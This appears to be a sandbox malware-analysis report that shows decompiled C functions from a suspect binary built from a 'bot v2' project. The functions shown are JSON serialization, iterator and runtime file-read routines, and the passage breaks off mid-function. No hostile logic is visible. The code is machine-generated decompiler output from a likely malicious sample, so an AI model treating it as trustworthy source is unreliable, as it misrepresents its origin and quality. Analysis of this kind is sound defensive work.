C-Code - Quality: 88%

			E0040D110(intOrPtr __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				void* _v5;
				void* _v6;
				void* _v7;
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				void* __ebx;
				void* _t141;
				signed int _t143;
				signed int _t194;
				signed int _t196;

				_t205 = __esi;
				_t204 = __edi;
				_v12 = __ecx;
				if((_a4 | _a8) != 0) {
					_v44 = _v12 + 8;
					E0041AD80(_v44,  &_v16);
					_v20 = 0;
					_t194 = E00411E20(_v12, _a4, _a8) & 0x000000ff;
					__eflags = _t194;
					if(_t194 == 0) {
						_t195 = _a8;
						_v76 = _a4;
						_v72 = _a8;
						_v20 = E0041B2F0(_v12, _a8, _v76, _v72);
					} else {
						 *((char*)(E004061D0( &_v16))) = 0x2d;
						_v76 = E004220D0(_t141, _v12, _t194, __edi, __esi, _a4, _a8);
						_v72 = _t194;
						_t195 = _v72;
						_v20 = E0041B2F0(_v12, _v72, _v76, _v72) + 1;
					}
					__eflags = _v20 - E00423E90(_v12 + 8) - 1;
					if(__eflags >= 0) {
						_push(0x41b0);
						E00430DB7(_t141, _t195, _t204, _t205, __eflags, L"n_chars < number_buffer.size() - 1", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					}
					E00417E60( &_v16, _v20);
					while(1) {
						__eflags = _v72;
						if(_v72 > 0) {
							goto L10;
						}
						__eflags = _v76 - 0x64;
						if(_v76 < 0x64) {
							__eflags = _v72;
							if(_v72 > 0) {
								L13:
								_v32 = _v76;
								_v56 = E00417230("0001020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989900010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v32);
								_v7 =  *((intOrPtr*)(E004171F0(_v56, 1)));
								 *(E004061D0(E004177F0( &_v16))) = _v7;
								_v60 = E00417230("0001020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989900010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v32);
								_v8 =  *((intOrPtr*)(E004171F0(_v60, 0)));
								 *(E004061D0(E004177F0( &_v16))) = _v8;
								L15:
								_v36 = E004061D0(_v12);
								_v68 =  *((intOrPtr*)( *_v36 + 4));
								__eflags = _v12 + 8;
								_v64 = E00414F10(_v12 + 8);
								return _v68(_v64, _v20);
							}
							__eflags = _v76 - 0xa;
							if(_v76 < 0xa) {
								_t143 = _v76 + 0x30;
								__eflags = _t143;
								 *(E004061D0(E004177F0( &_v16))) = _t143;
								goto L15;
							}
							goto L13;
						}
						L10:
						_t196 = _v76;
						_v28 = E00424AA0(_t196, _v72, 0x64, 0);
						_v76 = E00424A30(_v76, _v72, 0x64, 0);
						_v72 = _t196;
						_v48 = E00417230("0001020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989900010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v28);
						_v5 =  *((intOrPtr*)(E004171F0(_v48, 1)));
						 *(E004061D0(E004177F0( &_v16))) = _v5;
						_v52 = E00417230("0001020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989900010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v28);
						_v6 =  *((intOrPtr*)(E004171F0(_v52, 0)));
						 *(E004061D0(E004177F0( &_v16))) = _v6;
					}
				}
				_v24 = E004061D0(_v12);
				_v40 =  *((intOrPtr*)( *_v24));
				return _v40(0x30);
			}

0x0040d110
0x0040d110
0x0040d117
0x0040d120
0x0040d14a
0x0040d154
0x0040d159
0x0040d170
0x0040d173
0x0040d175
0x0040d1b3
0x0040d1b6
0x0040d1b9
0x0040d1cc
0x0040d177
0x0040d17f
0x0040d192
0x0040d195
0x0040d198
0x0040d1ab
0x0040d1ab
0x0040d1dd
0x0040d1e0
0x0040d1e2
0x0040d1f1
0x0040d1f6
0x0040d200
0x0040d205
0x0040d205
0x0040d209
0x00000000
0x00000000
0x0040d20b
0x0040d20f
0x0040d2ad
0x0040d2b1
0x0040d2b9
0x0040d2bc
0x0040d2cd
0x0040d2dc
0x0040d2f1
0x0040d301
0x0040d310
0x0040d325
0x0040d340
0x0040d348
0x0040d353
0x0040d359
0x0040d361
0x00000000
0x0040d36f
0x0040d2b3
0x0040d2b7
0x0040d32c
0x0040d32c
0x0040d33e
0x00000000
0x0040d33e
0x00000000
0x0040d2b7
0x0040d215
0x0040d21d
0x0040d226
0x0040d23a
0x0040d23d
0x0040d24e
0x0040d25d
0x0040d272
0x0040d282
0x0040d291
0x0040d2a6
0x0040d2a6
0x0040d205
0x0040d12a
0x0040d134
0x00000000

APIs

weak_ptr.LIBCPMTD ref: 0040D154
_DebugHeapAllocator.LIBCPMTD ref: 0040D200
__aullrem.LIBCMT ref: 0040D221
__aulldiv.LIBCMT ref: 0040D235

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708091011121314151617181920212223242526272829, xrefs: 0040D244, 0040D278, 0040D2C3, 0040D2F7
n_chars < number_buffer.size() - 1, xrefs: 0040D1EC
d, xrefs: 0040D20B
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040D1E7

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocatorDebugHeap__aulldiv__aullremweak_ptr
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708091011121314151617181920212223242526272829$C:\Users\root\Desktop\bot v2\json.hpp$d$n_chars < number_buffer.size() - 1
API String ID: 1707029608-152829871
Opcode ID: a300671e230d1177f67542c609b6ba5507f018d7e68fcb05e0abebf5d811a294
Instruction ID: b5179f6a1d7dd8fbae5880fa994d3d41419858bc70ea360c83e93b9e0abc65ac
Opcode Fuzzy Hash: a300671e230d1177f67542c609b6ba5507f018d7e68fcb05e0abebf5d811a294
Instruction Fuzzy Hash: 29813270E04248AFCB04EFE9D851AEEBBB1AF49304F14406EE5156B392DB386D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 203
memoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040CEA0(intOrPtr __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				void* _v5;
				void* _v6;
				void* _v7;
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				void* __ebx;
				void* _t141;
				signed int _t143;
				signed int _t194;
				signed int _t196;

				_t205 = __esi;
				_t204 = __edi;
				_v12 = __ecx;
				if((_a4 | _a8) != 0) {
					_v44 = _v12 + 8;
					E0041AD80(_v44,  &_v16);
					_v20 = 0;
					_t194 = E00411DF0(_v12, _a4, _a8) & 0x000000ff;
					__eflags = _t194;
					if(_t194 == 0) {
						_t195 = _a8;
						_v76 = _a4;
						_v72 = _a8;
						_v20 = E0041B2F0(_v12, _a8, _v76, _v72);
					} else {
						 *((char*)(E004061D0( &_v16))) = 0x2d;
						_v76 = E004220D0(_t141, _v12, _t194, __edi, __esi, _a4, _a8);
						_v72 = _t194;
						_t195 = _v72;
						_v20 = E0041B2F0(_v12, _v72, _v76, _v72) + 1;
					}
					__eflags = _v20 - E00423E90(_v12 + 8) - 1;
					if(__eflags >= 0) {
						_push(0x41b0);
						E00430DB7(_t141, _t195, _t204, _t205, __eflags, L"n_chars < number_buffer.size() - 1", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					}
					E00417E60( &_v16, _v20);
					while(1) {
						__eflags = _v72;
						if(_v72 > 0) {
							goto L10;
						}
						__eflags = _v76 - 0x64;
						if(_v76 < 0x64) {
							__eflags = _v72;
							if(_v72 > 0) {
								L13:
								_v32 = _v76;
								_v56 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v32);
								_v7 =  *((intOrPtr*)(E004171F0(_v56, 1)));
								 *(E004061D0(E004177F0( &_v16))) = _v7;
								_v60 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v32);
								_v8 =  *((intOrPtr*)(E004171F0(_v60, 0)));
								 *(E004061D0(E004177F0( &_v16))) = _v8;
								L15:
								_v36 = E004061D0(_v12);
								_v68 =  *((intOrPtr*)( *_v36 + 4));
								__eflags = _v12 + 8;
								_v64 = E00414F10(_v12 + 8);
								return _v68(_v64, _v20);
							}
							__eflags = _v76 - 0xa;
							if(_v76 < 0xa) {
								_t143 = _v76 + 0x30;
								__eflags = _t143;
								 *(E004061D0(E004177F0( &_v16))) = _t143;
								goto L15;
							}
							goto L13;
						}
						L10:
						_t196 = _v76;
						_v28 = E00424AA0(_t196, _v72, 0x64, 0);
						_v76 = E00424A30(_v76, _v72, 0x64, 0);
						_v72 = _t196;
						_v48 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v28);
						_v5 =  *((intOrPtr*)(E004171F0(_v48, 1)));
						 *(E004061D0(E004177F0( &_v16))) = _v5;
						_v52 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o", _v28);
						_v6 =  *((intOrPtr*)(E004171F0(_v52, 0)));
						 *(E004061D0(E004177F0( &_v16))) = _v6;
					}
				}
				_v24 = E004061D0(_v12);
				_v40 =  *((intOrPtr*)( *_v24));
				return _v40(0x30);
			}

0x0040cea0
0x0040cea0
0x0040cea7
0x0040ceb0
0x0040ceda
0x0040cee4
0x0040cee9
0x0040cf00
0x0040cf03
0x0040cf05
0x0040cf43
0x0040cf46
0x0040cf49
0x0040cf5c
0x0040cf07
0x0040cf0f
0x0040cf22
0x0040cf25
0x0040cf28
0x0040cf3b
0x0040cf3b
0x0040cf6d
0x0040cf70
0x0040cf72
0x0040cf81
0x0040cf86
0x0040cf90
0x0040cf95
0x0040cf95
0x0040cf99
0x00000000
0x00000000
0x0040cf9b
0x0040cf9f
0x0040d03d
0x0040d041
0x0040d049
0x0040d04c
0x0040d05d
0x0040d06c
0x0040d081
0x0040d091
0x0040d0a0
0x0040d0b5
0x0040d0d0
0x0040d0d8
0x0040d0e3
0x0040d0e9
0x0040d0f1
0x00000000
0x0040d0ff
0x0040d043
0x0040d047
0x0040d0bc
0x0040d0bc
0x0040d0ce
0x00000000
0x0040d0ce
0x00000000
0x0040d047
0x0040cfa5
0x0040cfad
0x0040cfb6
0x0040cfca
0x0040cfcd
0x0040cfde
0x0040cfed
0x0040d002
0x0040d012
0x0040d021
0x0040d036
0x0040d036
0x0040cf95
0x0040ceba
0x0040cec4
0x00000000

APIs

weak_ptr.LIBCPMTD ref: 0040CEE4
_DebugHeapAllocator.LIBCPMTD ref: 0040CF90
__aullrem.LIBCMT ref: 0040CFB1
__aulldiv.LIBCMT ref: 0040CFC5

Strings

n_chars < number_buffer.size() - 1, xrefs: 0040CF7C
d, xrefs: 0040CF9B
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040CF77
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o, xrefs: 0040CFD4, 0040D008, 0040D053, 0040D087

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocatorDebugHeap__aulldiv__aullremweak_ptr
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899o$C:\Users\root\Desktop\bot v2\json.hpp$d$n_chars < number_buffer.size() - 1
API String ID: 1707029608-2897566805
Opcode ID: fb700ec9ef04426a59231a7f4aa87c7ab509e662e80f2a85e0219132cf55ffb7
Instruction ID: e1cd8cc4b2fd59f4b025853c6027009c8954179161ace6cc139e8ab8e4b0b073
Opcode Fuzzy Hash: fb700ec9ef04426a59231a7f4aa87c7ab509e662e80f2a85e0219132cf55ffb7
Instruction Fuzzy Hash: 00814370E04248EFCB04EFE5D891AEEBBB5AF48304F14416EE5156B392CB386D45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC30 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CC30(intOrPtr __ecx, void* __edi, void* __esi, signed int _a4) {
				void* _v5;
				void* _v6;
				void* _v7;
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				void* __ebx;
				signed char _t89;
				void* _t135;
				signed int _t137;
				signed int _t185;
				signed int _t188;

				_t197 = __esi;
				_t196 = __edi;
				_v12 = __ecx;
				if((_a4 & 0x000000ff) != 0) {
					_v44 = _v12 + 8;
					_t185 =  &_v16;
					E0041AD80(_v44, _t185);
					_v20 = 0;
					_t89 = E00411DE0(_v12, _a4 & 0x000000ff);
					__eflags = _t89 & 0x000000ff;
					if((_t89 & 0x000000ff) == 0) {
						asm("cdq");
						_v76 = _a4 & 0x000000ff;
						_v72 = _t185;
						_t186 = _v76;
						_v20 = E0041B2F0(_v12, _v76, _v76, _v72);
					} else {
						 *((char*)(E004061D0( &_v16))) = 0x2d;
						asm("cdq");
						_v76 = E004220D0(_t135, _v12, _t185, __edi, __esi, _a4 & 0x000000ff, _t185);
						_v72 = _t185;
						_t186 = _v72;
						_v20 = E0041B2F0(_v12, _v72, _v76, _v72) + 1;
					}
					__eflags = _v20 - E00423E90(_v12 + 8) - 1;
					if(__eflags >= 0) {
						_push(0x41b0);
						E00430DB7(_t135, _t186, _t196, _t197, __eflags, L"n_chars < number_buffer.size() - 1", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					}
					E00417E60( &_v16, _v20);
					while(1) {
						__eflags = _v72;
						if(_v72 > 0) {
							goto L10;
						}
						__eflags = _v76 - 0x64;
						if(_v76 < 0x64) {
							__eflags = _v72;
							if(_v72 > 0) {
								L13:
								_v32 = _v76;
								_v56 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n", _v32);
								_v7 =  *((intOrPtr*)(E004171F0(_v56, 1)));
								 *(E004061D0(E004177F0( &_v16))) = _v7;
								_v60 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n", _v32);
								_v8 =  *((intOrPtr*)(E004171F0(_v60, 0)));
								 *(E004061D0(E004177F0( &_v16))) = _v8;
								L15:
								_v36 = E004061D0(_v12);
								_v68 =  *((intOrPtr*)( *_v36 + 4));
								__eflags = _v12 + 8;
								_v64 = E00414F10(_v12 + 8);
								return _v68(_v64, _v20);
							}
							__eflags = _v76 - 0xa;
							if(_v76 < 0xa) {
								_t137 = _v76 + 0x30;
								__eflags = _t137;
								 *(E004061D0(E004177F0( &_v16))) = _t137;
								goto L15;
							}
							goto L13;
						}
						L10:
						_v28 = E00424AA0(_v76, _v72, 0x64, 0);
						_t188 = _v76;
						_v76 = E00424A30(_t188, _v72, 0x64, 0);
						_v72 = _t188;
						_v48 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n", _v28);
						_v5 =  *((intOrPtr*)(E004171F0(_v48, 1)));
						 *(E004061D0(E004177F0( &_v16))) = _v5;
						_v52 = E00417230("00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n", _v28);
						_v6 =  *((intOrPtr*)(E004171F0(_v52, 0)));
						 *(E004061D0(E004177F0( &_v16))) = _v6;
					}
				}
				_v24 = E004061D0(_v12);
				_v40 =  *((intOrPtr*)( *_v24));
				return _v40(0x30);
			}

0x0040cc30
0x0040cc30
0x0040cc37
0x0040cc40
0x0040cc6a
0x0040cc6d
0x0040cc74
0x0040cc79
0x0040cc88
0x0040cc90
0x0040cc92
0x0040ccd0
0x0040ccd1
0x0040ccd4
0x0040ccdb
0x0040cce7
0x0040cc94
0x0040cc9c
0x0040cca3
0x0040ccae
0x0040ccb1
0x0040ccb4
0x0040ccc7
0x0040ccc7
0x0040ccf8
0x0040ccfb
0x0040ccfd
0x0040cd0c
0x0040cd11
0x0040cd1b
0x0040cd20
0x0040cd20
0x0040cd24
0x00000000
0x00000000
0x0040cd26
0x0040cd2a
0x0040cdc8
0x0040cdcc
0x0040cdd4
0x0040cdd7
0x0040cde8
0x0040cdf7
0x0040ce0c
0x0040ce1c
0x0040ce2b
0x0040ce40
0x0040ce5b
0x0040ce63
0x0040ce6e
0x0040ce74
0x0040ce7c
0x00000000
0x0040ce8a
0x0040cdce
0x0040cdd2
0x0040ce47
0x0040ce47
0x0040ce59
0x00000000
0x0040ce59
0x00000000
0x0040cdd2
0x0040cd30
0x0040cd41
0x0040cd4c
0x0040cd55
0x0040cd58
0x0040cd69
0x0040cd78
0x0040cd8d
0x0040cd9d
0x0040cdac
0x0040cdc1
0x0040cdc1
0x0040cd20
0x0040cc4a
0x0040cc54
0x00000000

APIs

weak_ptr.LIBCPMTD ref: 0040CC74
_DebugHeapAllocator.LIBCPMTD ref: 0040CD1B
__aullrem.LIBCMT ref: 0040CD3C
__aulldiv.LIBCMT ref: 0040CD50

Strings

n_chars < number_buffer.size() - 1, xrefs: 0040CD07
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n, xrefs: 0040CD5F, 0040CD93, 0040CDDE, 0040CE12
d, xrefs: 0040CD26
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040CD02

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocatorDebugHeap__aulldiv__aullremweak_ptr
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899n$C:\Users\root\Desktop\bot v2\json.hpp$d$n_chars < number_buffer.size() - 1
API String ID: 1707029608-586673515
Opcode ID: a274c18ee9706894224aabe11d5fda02a52f1ddcdee667a5f683c47607613cf6
Instruction ID: ef41831a5da1426021c7d492bffe7a1d1d1e6c658b1af4aca2f66b97a420b1a3
Opcode Fuzzy Hash: a274c18ee9706894224aabe11d5fda02a52f1ddcdee667a5f683c47607613cf6
Instruction Fuzzy Hash: 43813070E04258EFCB04EFE5D891AEEBBB1AF49304F14416EE515AB392D7381945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417470 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00417470(void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				signed int* _v24;
				signed int* _v28;
				char _v32;
				char _v36;
				void* __ebp;
				signed char _t31;
				void* _t63;

				_t62 = __esi;
				_t61 = __edi;
				_t44 = __ebx;
				_v8 = __ecx;
				_t65 =  *_v8;
				if( *_v8 == 0) {
					_push(0x2db8);
					E00430DB7(__ebx, __edx, __edi, __esi, _t65, L"m_object != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t63 = _t63 + 0xc;
				}
				_v12 =  *( *_v8) & 0x000000ff;
				if(_v12 > 9) {
					L10:
					_t48 =  &(_v8[3]);
					_t31 = E00420BC0( &(_v8[3]));
					_t57 = _t31 & 0x000000ff;
					__eflags = _t31 & 0x000000ff;
					if((_t31 & 0x000000ff) == 0) {
						return E0042972B(_t44, _t48, _t57, _t61, _t62);
					}
					return  *_v8;
				} else {
					switch( *((intOrPtr*)(_v12 * 4 +  &M00417584))) {
						case 0:
							goto L10;
						case 1:
							_v20 =  &(_v8[1]);
							_v16 =  *((intOrPtr*)( *_v8 + 8));
							_t39 = E00417140(_v20, E0041EE00(_v16,  &_v32));
							_t60 = _t39 & 0x000000ff;
							_t67 = _t39 & 0x000000ff;
							if((_t39 & 0x000000ff) == 0) {
								_push(0x2dbe);
								E00430DB7(_t44, _t60, _t61, _t62, _t67, L"m_it.object_iterator != m_object->m_value.object->end()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							}
							return E00417450( &(_v8[1])) + 0x18;
						case 2:
							_v8 =  &(_v8[2]);
							_v28 =  &(_v8[2]);
							__edx = _v8;
							__eax =  *_v8;
							__ecx =  *(__eax + 8);
							_v24 =  *(__eax + 8);
							__edx =  &_v36;
							__ecx = _v24;
							__eax = E0041EF80(_v24,  &_v36);
							__ecx = _v28;
							__eax = __al & 0x000000ff;
							__eflags = __al & 0x000000ff;
							if(__eflags == 0) {
								_push(0x2dc4);
								__eax = E00430DB7(__ebx, __edx, __edi, __esi, __eflags, L"m_it.array_iterator != m_object->m_value.array->end()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							}
							__ecx = _v8;
							__ecx =  &(_v8[2]);
							return E004061D0( &(_v8[2]));
					}
				}
			}

0x00417470
0x00417470
0x00417470
0x00417476
0x0041747c
0x0041747f
0x00417481
0x00417490
0x00417495
0x00417495
0x004174a0
0x004174a7
0x00417562
0x00417565
0x00417568
0x0041756d
0x00417570
0x00417572
0x00000000
0x0041757b
0x00000000
0x004174ad
0x004174b0
0x00000000
0x00000000
0x00000000
0x004174bd
0x004174c8
0x004174db
0x004174e0
0x004174e3
0x004174e5
0x004174e7
0x004174f6
0x004174fb
0x00000000
0x00000000
0x00417511
0x00417514
0x00417517
0x0041751a
0x0041751c
0x0041751f
0x00417522
0x00417526
0x00417529
0x0041752f
0x00417537
0x0041753a
0x0041753c
0x0041753e
0x0041754d
0x00417552
0x00417555
0x00417558
0x00000000
0x00000000
0x004174b0

APIs

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 004174DB
std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 00417504
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00417532
List.LIBCMTD ref: 00417568

Strings

m_it.array_iterator != m_object->m_value.array->end(), xrefs: 00417548
m_it.object_iterator != m_object->m_value.object->end(), xrefs: 004174F1
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 00417486, 004174EC, 00417543
m_object != nullptr, xrefs: 0041748B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Affinity::operator!=Concurrency::details::Hardware$ListMutex_baseMutex_base::~_std::_
String ID: C:\Users\root\Desktop\bot v2\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
API String ID: 3520467429-833464470
Opcode ID: 80f6ae7e357f683971f376cd0224e8e92d77f9bcad3174c6b176a05f40219e3d
Instruction ID: 9d88cf6538153e17a13e621f9c645f6776fc15ceeba439f12f962ffa011d6038
Opcode Fuzzy Hash: 80f6ae7e357f683971f376cd0224e8e92d77f9bcad3174c6b176a05f40219e3d
Instruction Fuzzy Hash: 0431B530E44209EFDB08DF95D992AEEB7B2AF44304F20415EE50567391DA38AE40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043C9CB Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0043C9CB(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00429356(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00429369( *_t137))) = 9;
						L60:
						_t139 = E0042928F();
						goto L61;
					}
					__eflags = _t198 -  *0x4c7760; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x4c7560 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
